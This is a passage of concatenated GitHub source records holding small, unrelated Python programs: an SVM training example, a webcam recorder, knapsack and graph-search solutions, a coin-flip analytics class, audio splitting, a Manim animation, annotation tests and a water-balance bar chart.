part1(lines)\npart2(lines)\n","repo_name":"mh3r/advent_of_code_solutions","sub_path":"advent2020/src/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36760583634","text":"# Linear Support Vector Machine: Soft Margin\n# ----------------------------------\n#\n# This function shows how to use TensorFlow to\n# create a soft margin SVM\n#\n# We will use the iris data, specifically:\n# x1 = Sepal Length\n# x2 = Petal Width\n# Class 1 : I. setosa\n# Class -1: not I. setosa\n#\n# We know here that x and y are linearly seperable\n# for I. setosa classification.\n\n# import required libraries\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport os\nimport datetime\nfrom packaging import version\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn import datasets\nfrom tensorflow.python.framework import ops\n\nprint(__doc__)\n\n# Display current path\nPROJECT_ROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nprint('PROJECT_ROOT_DIR = \\n{0}\\n'.format(PROJECT_ROOT_DIR))\n\n# Display tensorflow version\nprint(\"TensorFlow version: \", tf.version.VERSION)\nassert version.parse(tf.version.VERSION).release[0] >= 2, \"This notebook requires TensorFlow 2.0 or above.\"\n\n# Set random seeds\nnp.random.seed(7)\ntf.random.set_seed(7)\n\n# Load the data\n# iris.data = [(Sepal Length, Sepal Width, Petal Length, Petal Width)]\niris = datasets.load_iris()\nx_vals = np.array([[x[0], x[3]] for x in iris.data])\ny_vals = np.array([1 if y == 0 else -1 for y in iris.target])\n\n# Split data into train/test sets\ntrain_indices = np.random.choice(\n len(x_vals),\n int(round(len(x_vals)*0.9)),\n replace=False\n )\n\ntest_indices = np.array(list(set(range(len(x_vals))) - set(train_indices)))\nx_vals_train = x_vals[train_indices]\nx_vals_test = x_vals[test_indices]\ny_vals_train = y_vals[train_indices]\ny_vals_test = y_vals[test_indices]\n\n# Declare batch size\nbatch_size = 135\n\n# Create variables for linear regression\nA = tf.cast(tf.Variable(tf.random.normal(shape=[2, 1])), dtype=tf.float32)\nb = tf.cast(tf.Variable(tf.random.normal(shape=[1, 1])), dtype=tf.float32)\n\ndef loss(input_x, aa, bb, targets):\n # Declare model operations\n model_output_loss = tf.subtract(tf.matmul(input_x, aa), bb)\n\n # Declare vector L2 'norm' function squared\n l2_norm = tf.reduce_sum(tf.square(aa))\n\n # Declare loss function\n # Loss = max(0, 1-pred*actual) + alpha * L2_norm(A)^2\n # L2 regularization parameter, alpha\n alpha = tf.constant([0.01])\n\n # Margin term in loss\n classification_term = tf.reduce_mean(tf.maximum(0., tf.subtract(1., tf.multiply(model_output_loss, targets))))\n\n # Put terms together\n return tf.add(classification_term, tf.multiply(alpha, l2_norm))\n\ndef grad(input_x, aa, bb, targets):\n with tf.GradientTape() as tape:\n loss_value = loss(input_x, aa, bb, targets)\n return tape.gradient(loss_value, [aa, bb])\n\ndef accuracy(input_x, aa, bb, targets):\n # Declare model operations\n model_output_acc = tf.subtract(tf.matmul(input_x, aa), bb)\n\n # Declare prediction function\n prediction = tf.sign(model_output_acc)\n return tf.reduce_mean(tf.cast(tf.equal(prediction, targets), tf.float32)) \n\n# Declare optimizer\noptimizer = tf.keras.optimizers.SGD(learning_rate=0.01)\n\n# Training loop\nloss_vec = []\ntrain_accuracy = []\ntest_accuracy = []\n\nfor i in range(500):\n rand_index = np.random.choice(len(x_vals_train), size=batch_size)\n rand_x = tf.cast(x_vals_train[rand_index], dtype=tf.float32)\n rand_y = tf.cast(np.transpose([y_vals_train[rand_index]]), dtype=tf.float32)\n\n grads = grad(rand_x, A, b, rand_y)\n optimizer.apply_gradients(zip(grads, [A, b]))\n\n temp_loss = loss(rand_x, A, b, rand_y)\n loss_vec.append(temp_loss)\n\n train_acc_temp = accuracy(tf.cast(x_vals_train, dtype=tf.float32), A, b, tf.cast(np.transpose([y_vals_train]), dtype=tf.float32))\n train_accuracy.append(train_acc_temp)\n\n test_acc_temp = accuracy(tf.cast(x_vals_test, dtype=tf.float32), A, b, tf.cast(np.transpose([y_vals_test]), dtype=tf.float32))\n test_accuracy.append(test_acc_temp)\n\n if (i + 1) % 100 == 0:\n print('Step #{0} A = {1}, b = {2}'.format(i + 1, A.numpy(), b.numpy()))\n print('Loss = {0}\\n'.format(temp_loss.numpy()))\n\n# Extract coefficients\n[[a1], [a2]] = A.numpy()\n[[b]] = b.numpy()\nslope = -a2/a1\ny_intercept = b/a1\n\n# Extract x1 and x2 vals\nx1_vals = [d[1] for d in x_vals]\n\n# Get best fit line\nbest_fit = []\nfor i in x1_vals:\n best_fit.append(slope * i + y_intercept)\n\n# Separate I. setosa\nsetosa_x = [d[1] for i, d in enumerate(x_vals) if y_vals[i] == 1]\nsetosa_y = [d[0] for i, d in enumerate(x_vals) if y_vals[i] == 1]\nnot_setosa_x = [d[1] for i, d in enumerate(x_vals) if y_vals[i] == -1]\nnot_setosa_y = [d[0] for i, d in enumerate(x_vals) if y_vals[i] == -1]\n\n# Plot data and line\nplt.plot(setosa_x, setosa_y, 'o', label='I. setosa')\nplt.plot(not_setosa_x, not_setosa_y, 'x', label='Non-setosa')\nplt.plot(x1_vals, best_fit, 'r-', label='Linear Separator', linewidth=3)\nplt.ylim([0, 10])\nplt.legend(loc='lower right')\nplt.title('Sepal Length vs Petal Width')\nplt.xlabel('Petal Width')\nplt.ylabel('Sepal Length')\nplt.show()\n\n# Plot train/test accuracies\nplt.plot(train_accuracy, 'k-', label='Training Accuracy')\nplt.plot(test_accuracy, 'r--', label='Test Accuracy')\nplt.title('Train and Test Set Accuracies')\nplt.xlabel('Generation')\nplt.ylabel('Accuracy')\nplt.legend(loc='lower right')\nplt.show()\n\n# Plot loss over time\nplt.plot(loss_vec, 'k-')\nplt.title('Loss per Generation')\nplt.xlabel('Generation')\nplt.ylabel('Loss')\nplt.show()\n\ndate_today = datetime.date.today()\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n )\n\nprint (\n ' finished linear_svm.py ({0}) \\n'.format(date_today)\n )\n\nprint(\n '------------------------------------------------------------------------------------------------------\\n'\n )\nprint()\nprint()\nprint()","repo_name":"munezou/VsCodeProject","sub_path":"Python/lect_tensorflow/tensorflow_cookbook_master/sec04_Support_Vector_Machines/chpt02_Working_with_Linear_SVMs/linear_svm.py","file_name":"linear_svm.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30599386226","text":"import cv2\ncap = cv2.VideoCapture(0)\nwidth = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\nheight = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nwriter = cv2.VideoWriter(\"../videos/video_1.mp4\", fourcc, 20.0, (width,height))\n\nwhile True:\n ret, frame = cap.read()\n writer.write(frame)\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\ncap.release()\nwriter.release() \ncv2.destroyAllWindows() ","repo_name":"muhammadali448/computerVisionOpenCv","sub_path":"videoProcessing/connectingVideo.py","file_name":"connectingVideo.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1564048083","text":"'''N, K = map(int,input().split())\nweight = []\nvalue = []\nfor _ in range(N) :\n w, v = map(int,input().split())\n weight.append(w)\n value.append(v)\nmax = 0\nfor i in range(N) :\n sum = K\n v_m = value[i]\n sum -= weight[i]\n print(\"11111: \",weight[i])\n for a in range(i+1,N) :\n if weight[a] <= sum :\n sum -= weight[a]\n v_m += value[a]\n print(\"a: \",weight[a])\n if max < v_m :\n max = v_m\nprint(max)'''\nimport sys\n\n(N, K) = map(int, sys.stdin.readline().split())\nitem = [[0, 0]]\nfor i in range(1, N + 1):\n item.append(list(map(int, sys.stdin.readline().split())))\ndp = [[0] * (K + 1) for _ in range(N + 1)] # (N+1) x (K+1) matrix\n\nfor i in range(1, N + 1):\n for j in range(1, K + 1):\n if j >= item[i][0]:\n dp[i][j] = max(dp[i-1][j], dp[i-1][j-item[i][0]] + item[i][1])\n else: \n dp[i][j] = dp[i-1][j]\n\nprint(dp)","repo_name":"YOMi-Ed/BaekJoon","sub_path":"12865.py","file_name":"12865.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24762008147","text":"from random import randint\nimport logging\nimport requests\nimport json\n\n\nclass Research:\n def __init__(self, data_path):\n self.data_path = data_path\n self.logger = logging.getLogger('logger')\n self.logger.setLevel(logging.DEBUG)\n self.handler = logging.FileHandler('analytics.log', mode='w')\n self.logger.addHandler(self.handler)\n self.formatter = logging.Formatter(fmt='%(asctime)s %(message)s')\n self.handler.setFormatter(self.formatter)\n self.__file_reader = 0\n # self.data = self.file_reader()\n # self.calc = self.Calculations(self.data, self.logger)\n # self.analytics = self.Analytics(self.data, self.logger)\n\n def file_reader(self, has_header=True):\n if self.__file_reader != 0:\n self.logger.debug('Read ' + self.data_path)\n self.__file_reader += 1\n with open(self.data_path, 'r') as infile:\n rows = infile.readlines()\n if has_header:\n header = rows[0].split(',')\n if len(header) != 2:\n self.logger.error('File has wrong header')\n raise Exception('File has wrong header')\n rows = rows[1:]\n if len(rows) == 0:\n self.logger.error('File has no data')\n raise Exception('File has no data')\n res = []\n for row in rows:\n row = row.strip()\n if row != '0,1' and row != '1,0':\n self.logger.error('File has wrong data')\n raise Exception('File has wrong data')\n res.append([int(n) for n in row.split(',')])\n return res\n\n def send_report(self, message, webhook):\n slack_data = {'text': message}\n requests.post(\n webhook,\n data=json.dumps(slack_data),\n headers={'Content-Type': 'application/json'}\n )\n \n class Calculations:\n def __init__(self, data, logger):\n self.data = data\n self.logger = logger\n \n def counts(self):\n self.logger.debug('Calculating the counts of heads and tails')\n return [sum([el[0] for el in self.data]), sum([el[1] for el in self.data])]\n\n def fractions(self, heads, tails):\n self.logger.debug('Calculating the fractions of heads and tails')\n return [heads / (heads + tails) * 100, tails / (heads + tails) * 100]\n\n class Analytics(Calculations):\n def __init__(self, data, logger):\n super().__init__(data, logger)\n\n def predict_random(self, n):\n self.logger.debug('Predict the random of heads and tails')\n res = []\n for i in range(n):\n tmp = randint(0, 1)\n res.append([tmp, (tmp + 1) % 2])\n return res\n\n def predict_last(self):\n self.logger.debug('Predict the last of heads and tails')\n return self.data[-1]\n\n def save_file(self, data, file_name, extension='txt'):\n self.logger.debug('Save data to ' + file_name + '.' + extension)\n with open(file_name + '.' + extension, 'w') as outfile:\n outfile.write(data)\n","repo_name":"danlee65071/piscine_python_ds","sub_path":"day02/ex06/analytics.py","file_name":"analytics.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32336601672","text":"def dfs(start):\r\n visited[start] = True\r\n result.append(start)\r\n for i in range(1, n + 1):\r\n if not visited[i] and arr[start][i]:\r\n dfs(i)\r\n return result\r\n\r\n\r\nn = int(input())\r\nm = int(input())\r\narr = [[0] * (n + 1) for _ in range(n + 1)]\r\nvisited = [False] * (n + 1)\r\nresult = []\r\nfor _ in range(m):\r\n u, v = map(int, input().split())\r\n arr[u][v] = 1\r\n arr[v][u] = 1\r\n\r\nprint(len(dfs(1)) - 1)","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Silver/2606.py","file_name":"2606.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72070911527","text":"# 给定一个二叉树的根节点 root ,树中每个节点都存放有一个 0 到 9 之间的数字。 \n# \n# \n# \n# 每条从根节点到叶节点的路径都代表一个数字: \n# \n# \n# 例如,从根节点到叶节点的路径 1 -> 2 -> 3 表示数字 123 。 \n# \n# \n# 计算从根节点到叶节点生成的 所有数字之和 。 \n# \n# 叶节点 是指没有子节点的节点。 \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入:root = [1,2,3]\n# 输出:25\n# 解释:\n# 从根到叶子节点路径 1->2 代表数字 12\n# 从根到叶子节点路径 1->3 代表数字 13\n# 因此,数字总和 = 12 + 13 = 25 \n# \n# 示例 2: \n# \n# \n# 输入:root = [4,9,0,5,1]\n# 输出:1026\n# 解释:\n# 从根到叶子节点路径 4->9->5 代表数字 495\n# 从根到叶子节点路径 4->9->1 代表数字 491\n# 从根到叶子节点路径 4->0 代表数字 40\n# 因此,数字总和 = 495 + 491 + 40 = 1026\n# \n# \n# \n# \n# 提示: \n# \n# \n# 树中节点的数目在范围 [1, 1000] 内 \n# 0 <= Node.val <= 9 \n# 树的深度不超过 10 \n# \n# \n# \n# \n# \n# \n# 注意:本题与主站 129 题相同: https://leetcode-cn.com/problems/sum-root-to-leaf-numbers/ \n# \n# Related Topics 树 深度优先搜索 二叉树 👍 16 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n # def sumNumbers(self, root: TreeNode) -> int:\n # \"\"\"\n # 方法1:深度优先+分支思想\n # :param root:\n # :return:\n # \"\"\"\n # path = 0\n # if not root:\n # return path\n # return self.dfs(root, path)\n #\n # def dfs(self, node: TreeNode, path: int) -> int:\n # # 遍历到了叶结点的子节点,直接返回\n # if not node:\n # return 0\n # # 节点存在,加上当前节点值\n # path = path * 10 + node.val\n # # 节点为叶子节点,返回值\n # if not node.left and not node.right:\n # return path\n # # 分治思想,左右子节点值相加\n # return self.dfs(node.left, path) + self.dfs(node.right, path)\n\n # def sumNumbers(self, root: TreeNode) -> int:\n # path = 0\n #\n # def dfs(node, path):\n # if not node:\n # return 0\n # path = path * 10 + node.val\n # if not node.left and not node.right:\n # return path\n # return dfs(node.left, path) + dfs(node.right, path)\n # return dfs(root, path)\n\n def sumNumbers(self, root: TreeNode) -> int:\n \"\"\"\n 方法2:广度优先,层序遍历\n :param root:\n :return:\n \"\"\"\n from collections import deque\n # 两个队列,一个存遍历到的节点,一个存当前的和\n node_q = deque([root])\n sum_q = deque([root.val])\n\n res = 0\n while node_q:\n node = node_q.popleft()\n num = sum_q.popleft()\n left, right = node.left, node.right\n if not left and not right:\n # 到了叶子节点\n res += num\n else:\n if left:\n node_q.append(left)\n sum_q.append(num * 10 + left.val)\n if node.right:\n node_q.append(right)\n sum_q.append(num * 10 + right.val)\n return res\n\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[剑指 Offer II 049]从根节点到叶节点的路径数字之和.py","file_name":"[剑指 Offer II 049]从根节点到叶节点的路径数字之和.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10183894786","text":"import settings\nimport numpy as np\nimport librosa as lr\nfrom utils import stopwatch\n\n\n@stopwatch\ndef on_silence(y,\n merge=False,\n hop_length=settings.HOP_LENGTH,\n frame_length=settings.FRAME_LENGTH):\n \"\"\" Split signal into non-silent intervals.\n\n :param y: samples (signal)\n :param merge: merge splits into one signal\n\n :returns: signal (or segments), splits\n \"\"\"\n splits = lr.effects.split(y,\n hop_length=hop_length,\n frame_length=frame_length)\n\n # merge signal using provided indices\n if merge:\n return lr.effects.remix(y, intervals=splits)\n\n # return audio chunks based on indices\n return np.asarray([y[s:e] for s, e in splits]), splits\n\n\n@stopwatch\ndef on_onsets(y,\n sr=settings.SAMPLE_RATE,\n backtrack=True,\n hop_length=settings.HOP_LENGTH):\n \"\"\" Split signal based on detected onsets.\n Optionally try to locate nearest silent spot.\n\n :param y: samples (signal)\n :param sr: sample rate\n :param backtrack: locate silent spots\n\n :returns: array, onsets\n \"\"\"\n # extract backtracked onsets\n onsets = lr.onset.onset_detect(y=y,\n sr=sr,\n units='samples',\n backtrack=backtrack,\n hop_length=hop_length)\n\n # prepend first sample index\n onsets = np.insert(onsets, 0, 0)\n\n # append last sample index\n onsets = np.append(onsets, y.shape[0])\n\n # chunk to individual segments\n splits = [y[onsets[i]:onsets[i + 1]] for i, _ in enumerate(onsets[:-1])]\n return splits, onsets\n","repo_name":"nthe/milacc","sub_path":"src/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21693143173","text":"import manim as mn\nfrom potential import *\nimport matplotlib.pyplot as plt \nimport numpy as np\n\n\nmn.config.media_width = \"75%\"\nmn.config.verbosity = \"WARNING\"\n\n\n\nclass gatepot(mn.ThreeDScene):\n def construct(self):\n g = alternating_spacing(2, 90e-9, 50e-9, 90e-9, gap=10e-9, dot_voltage=-0.001, gate_voltage=0.001, drain_voltage=-1e-4)\n \n # self.set_camera_orientation(phi=60 * mn.DEGREES, theta=-60 * mn.DEGREES, zoom=0.9)\n self.set_camera_orientation(phi=0, theta=-mn.PI/2, zoom=1)\n \n ax = mn.ThreeDAxes(\n x_range=(-400e-9, 400e-9, 100e-9), \n y_range=(-200e-9, 200e-9, 100e-9), \n z_range=(-5e-4, 5e-4, 1e-4),\n axis_config={'include_ticks': True},\n tips=False)\n \n \n self.play(mn.Create(ax))\n self.wait(1)\n\n rects = []\n for name in g.gate_names:\n if name != 'S' and name != 'D':\n # create the rectangle scaled to fit the plot\n rects.append(mn.Rectangle(\n width=ax.coords_to_point(g[name].width)[0],\n height=ax.coords_to_point(g[name].height)[0],\n fill_opacity=0.1,\n color=mn.RED).move_to(ax.coords_to_point(*g[name].pos)))\n \n # add the name of the gate\n t = mn.Text(name).scale(0.5)\n t.move_to(rects[-1].get_top())\n t.shift(0.9 * t.height * mn.DOWN)\n rects.append(t)\n # add a rectangle for the source and the drain\n rects.append(mn.Rectangle(width=10, height=10, fill_opacity=0.1, color=mn.RED).move_to((ax.coords_to_point(g['S'].R)[0] - 5) * mn.RIGHT))\n rects.append(mn.Rectangle(width=10, height=10, fill_opacity=0.1, color=mn.RED).move_to((ax.coords_to_point(g['D'].L)[0] + 5) * mn.RIGHT))\n # add source and drain names\n rects.append(mn.Text('Source').rotate(mn.PI/2).move_to(6*mn.LEFT))\n rects.append(mn.Text('Drain').rotate(-mn.PI/2).move_to(6*mn.RIGHT))\n rects = mn.VGroup(*rects)\n\n self.play(mn.Create(rects))\n self.wait(2)\n\n surf = ax.plot_surface(\n function=g,\n u_range=(-300e-9, 300e-9),\n v_range=(-200e-9, 200e-9),\n fill_opacity=0.3)\n \n self.play(mn.Create(surf))\n self.wait(2)\n\n self.move_camera(phi=60 * mn.DEGREES, theta=-60 * mn.DEGREES, zoom=0.9)\n self.wait(2)\n\n self.play(mn.FadeOut(rects), run_time=1)\n self.wait(1)\n\n # wiggle gate voltages\n for name, v in [('X1', 0.002), ('P1', -0.002), ('X0', 0.0015), ('P0', -0.0015), ('P1', -0.001), ('X2', 0.0015), ('S', 0.0003), ('D', -3e-4)]:\n g[name].set_voltage(v)\n surf.target = ax.plot_surface(\n function=g,\n u_range=(-300e-9, 300e-9),\n v_range=(-200e-9, 200e-9),\n fill_opacity=0.3)\n \n self.play(mn.MoveToTarget(surf), run_time=2)\n self.wait(1.5)\n\n\n\nclass testing(mn.ThreeDScene):\n def construct(self):\n # self.set_camera_orientation(phi=60 * mn.DEGREES, theta=-60 * mn.DEGREES, zoom=0.9)\n\n # ax = mn.ThreeDAxes((-400e-9, 400e-9, 100e-9), (-200e-9, 200e-9, 100e-9), (-2e-4, 8e-4, 1e-4), axis_config={'include_tip': True})\n \n # # self.play(mn.Create(rects))\n # self.play(mn.Create(ax))\n # self.wait(1)\n \n self.set_camera_orientation(phi=2*mn.PI/5, theta=mn.PI/5)\n # axes = mn.ThreeDAxes(\n # x_range=(-6e-9, 6e-9, 1e-9),\n # y_range=(-6e-9, 6e-9, 1e-9))\n axes = mn.ThreeDAxes(\n x_range=(-400e-9, 400e-9, 100e-9), \n y_range=(-200e-9, 200e-9, 100e-9), \n z_range=(-5e-4, 5e-4, 1e-4),\n axis_config={'include_ticks': True},\n tips=False)\n # axes = mn.NumberLine(\n # x_range=(0, 400e-9, 20e-9),\n # include_tip=True,\n # length=8\n # )\n # axis_config={\"include_numbers\": True})\n # labels = axes.get_axis_labels(\n # mn.Tex(\"x-axis\").scale(0.7), mn.Text(\"y-axis\").scale(0.45), mn.Text(\"z-axis\").scale(0.45)\n # )\n self.play(mn.Create(axes))\n # self.wait(1)\n # self.play(mn.Create(labels))\n self.wait(2)","repo_name":"trishanamruthur/HRL-Labs-Clinic","sub_path":"Tunneling-Demo/anim.py","file_name":"anim.py","file_ext":"py","file_size_in_byte":4355,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37146544840","text":"\"\"\"\nFile: main.py\nAuthor: Delano Lourenco\nRepo: https://github.com/3ddelano/graph-visualizer-python\nLicense: MIT\n\"\"\"\n\nimport turtle\nfrom graph_gui.graphgui import GraphGUI, VERSION\nfrom graph_gui.constants import SCREEN_BG_COLOR\nimport traceback\n\n\ndef one_step():\n try:\n canvas.delete(\"all\")\n tur.clear()\n graphgui.draw(tur, canvas)\n screen.update()\n screen.ontimer(one_step, 50)\n except Exception as e:\n print(e)\n traceback.print_exc()\n print(\"Exiting program\")\n quit()\n\n\ndef onmove(self, fun, add=None):\n if fun is None:\n self.cv.unbind(\"\")\n else:\n\n def eventfun(event):\n fun(\n self.cv.canvasx(event.x) / self.xscale,\n -self.cv.canvasy(event.y) / self.yscale,\n )\n\n self.cv.bind(\"\", eventfun, add)\n\n\n# Setup the screen\nscreen = turtle.Screen()\nscreen.tracer(False)\nscreen.setup(1280, 720)\nscreen.setworldcoordinates(0, 720, 1280, 0)\nscreen.bgcolor(SCREEN_BG_COLOR)\ncanvas = screen.getcanvas()\n\n# The graph\ngraphgui = GraphGUI(canvas)\n\nscreen.title(f\"Graph Visualizer {VERSION} - 3ddelano\")\n\n# turtle.tracer(False)\nturtle.tracer(False)\ntur = turtle.Turtle()\ntur.speed(0)\ntur.hideturtle()\n\n# Events\nscreen.listen()\nturtle.onscreenclick(graphgui.on_left_click, 1)\nturtle.onscreenclick(graphgui.on_right_click, 3)\nonmove(screen, graphgui.ondrag, 1)\nscreen.onkey(graphgui.on_save, \"s\")\nscreen.onkey(graphgui.on_load, \"l\")\nscreen.onkey(graphgui.on_delete, \"d\")\nscreen.onkey(graphgui.on_bfs_start, \"b\")\nscreen.onkey(graphgui.on_dfs_start, \"n\")\nscreen.onkey(graphgui.on_help_toggle, \"h\")\nscreen.onkey(graphgui.on_nodeid_toggle, \"f\")\nscreen.onkey(graphgui.on_update_weight, \"w\")\nexited = False\n\n# Main loop\nprint(\"Graph Visualizer starting...\")\none_step()\nscreen.mainloop()\n","repo_name":"3ddelano/graph-visualizer-python","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21963730224","text":"from shapely.geometry import box\n\nfrom pims.processing.annotations import ParsedAnnotation, ParsedAnnotations, get_annotation_region\nfrom pims.processing.region import Region\nfrom pims.utils.color import Color\n\n\ndef test_annotation():\n geom = box(10, 20, 30, 40)\n annot = ParsedAnnotation(geom)\n assert annot.is_fill_grayscale is True\n assert annot.is_stroke_grayscale is True\n assert annot.bounds == (10, 20, 30, 40)\n\n grey = Color(\"grey\")\n red = Color(\"red\")\n annot = ParsedAnnotation(geom, fill_color=red, stroke_color=grey)\n assert annot.is_fill_grayscale is False\n assert annot.is_stroke_grayscale is True\n assert annot.is_grayscale is False\n\n annot = ParsedAnnotation(geom, fill_color=grey, stroke_color=grey)\n assert annot.is_grayscale is True\n\n\ndef test_annotation_list():\n grey = Color(\"grey\")\n white = Color(\"white\")\n red = Color(\"red\")\n\n annot1 = ParsedAnnotation(box(10, 20, 30, 40), fill_color=white, stroke_color=red)\n annot2 = ParsedAnnotation(box(5, 100, 20, 200), fill_color=grey, stroke_color=white)\n\n al = ParsedAnnotations()\n al.append(annot1)\n al.append(annot2)\n\n assert len(al) == 2\n assert al[1] == annot2\n assert al.is_fill_grayscale is True\n assert al.is_stroke_grayscale is False\n assert al.is_grayscale is False\n assert al.bounds == (5, 20, 30, 200)\n\n\ndef test_annotation_region():\n class FakeImage:\n def __init__(self, w, h):\n self.width = w\n self.height = h\n\n al = ParsedAnnotations()\n al.append(ParsedAnnotation(box(10, 20, 30, 40)))\n assert get_annotation_region(\n FakeImage(100, 100), al\n ) == Region(20, 10, 20, 20)\n assert get_annotation_region(\n FakeImage(100, 100), al, context_factor=1.5\n ) == Region(15, 5, 30, 30)\n\n al = ParsedAnnotations()\n al.append(ParsedAnnotation(box(10, 20, 30, 30)))\n assert get_annotation_region(\n FakeImage(100, 100), al, try_square=True\n ) == Region(15, 10, 20, 20)\n\n al = ParsedAnnotations()\n al.append(ParsedAnnotation(box(20, 10, 30, 30)))\n assert get_annotation_region(\n FakeImage(100, 100), al, try_square=True\n ) == Region(10, 15, 20, 20)\n","repo_name":"Cytomine-ULiege/pims","sub_path":"tests/test_processing_annotations.py","file_name":"test_processing_annotations.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18775561100","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.colors\nfrom matplotlib import ticker\nimport datetime as dt\nimport netCDF4 as nc\n\n\nfdfl = \"EucFACE_amb_default-met_only_or-off.csv\"\nfctl = \"EucFACE_amb_ctl_met_LAI_vrt_SM_swilt-watr_31uni_HDM_or-off-litter_Hvrd.csv\"\n\ndfl = pd.read_csv(fdfl, usecols = ['Year','Season','Rainf','Evap','TVeg','ESoil','ECanop','Qs','Qsb','Qrecharge','soil_storage_chg'])\nctl = pd.read_csv(fctl, usecols = ['Year','Season','Rainf','Evap','TVeg','ESoil','ECanop','Qs','Qsb','Qrecharge','soil_storage_chg'])\n\ndfl['Qs'] = dfl['Qs']+dfl['Qsb']\nctl['Qs'] = ctl['Qs']+ctl['Qsb']\n\ndfl = dfl.drop(['Year','Season','Qsb'], axis=1)\nctl = ctl.drop(['Year','Season','Qsb'], axis=1)\n\ndfl = dfl.drop([0])\nctl = ctl.drop([0])\n\nprint(dfl)\nprint(ctl)\n\nobs = [[155,153,99,34,20,0,0,-113],\\\n [84,84,61,19,3,0,0,-45],\\\n [250,120,75,24,21,0,0,114],\\\n [151,159,106,36,16,0,0,-149],\\\n [170,132,76,27,30,0,0,-26],\\\n [150,80,50,13,18,0,0,25]]\n # Autum-2013\n # Winter-2013\n # Spring-2013\n # Summer-2014\n # Autum-2014\n # Winter-2014\nprint(np.sum(dfl.iloc[0:4].values,axis=0))\nprint(np.sum(obs[1:5],axis=0))\n\ntitle = 'Water Balance'\n\n# _____________ Make plot _____________\nfig = plt.figure(figsize=(8,6))\nfig.subplots_adjust(hspace=0.3)\nfig.subplots_adjust(wspace=0.2)\nplt.rcParams['text.usetex'] = False\nplt.rcParams['font.family'] = \"sans-serif\"\nplt.rcParams['font.sans-serif'] = \"Helvetica\"\nplt.rcParams['axes.labelsize'] = 12\nplt.rcParams['font.size'] = 12\nplt.rcParams['legend.fontsize'] = 12\nplt.rcParams['xtick.labelsize'] = 12\nplt.rcParams['ytick.labelsize'] = 12\n\nax = fig.add_subplot(111)\n\nlabels = ['Rain','Evap','TVeg','ESoil','ECanop','Runoff','Rechrg','ΔS']\nx = np.arange(len(labels)) # the label locations\nwidth = 0.6 # the width of the bars\n\nrects1 = ax.bar(x - 0.2, np.sum(obs[0:4],axis=0), width/3, color='blue', label='obs')\nrects2 = ax.bar(x , np.sum(dfl.iloc[1:5].values,axis=0), width/3, color='orange', label='def')\nrects3 = ax.bar(x + 0.2, np.sum(ctl.iloc[1:5].values,axis=0), width/3, color='green', label='imp')\n\n# Add some text for labels, title and custom x-axis tick labels, etc.\nax.set_ylabel('$mm y^{-1}$')\nax.set_title(title)\nax.set_xticks(x)\nax.set_xticklabels(labels)\nax.legend()\n\n#fig.tight_layout()\n\nplt.show()\n\nfig.savefig('water_balance_2013_obs-def-ctl', bbox_inches='tight',pad_inches=0.1)\n","repo_name":"bibivking/EucFACE_run","sub_path":"plots/plot_eucface_waterbal_bar_year.py","file_name":"plot_eucface_waterbal_bar_year.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27967361106","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n#https://www.acmicpc.net/problem/17271\n# from itertools import permutations,product\n# n,m = wow()\n# n_list = [1,m]\n# for i in range(2,n+1):\n# temp_list = []\n# for k in range(1,i+1):\n# new_list = list(product(n_list,repeat=k))\n# new_list = [index for index in new_list if sum(index) == i]\n# temp_list.extend(new_list)\n# print(i,len(temp_list))\n\n# n,m = wow()\n# n_list = [0]*(n+1)\n# # print(n_list)\n# for i in range(1,min(m+1,n+1)):\n# # print(\"Start\",i)\n# if i != m:\n# n_list[i]=1\n# else:\n# n_list[i]=2\n# for k in range(m+1,n+1):\n# 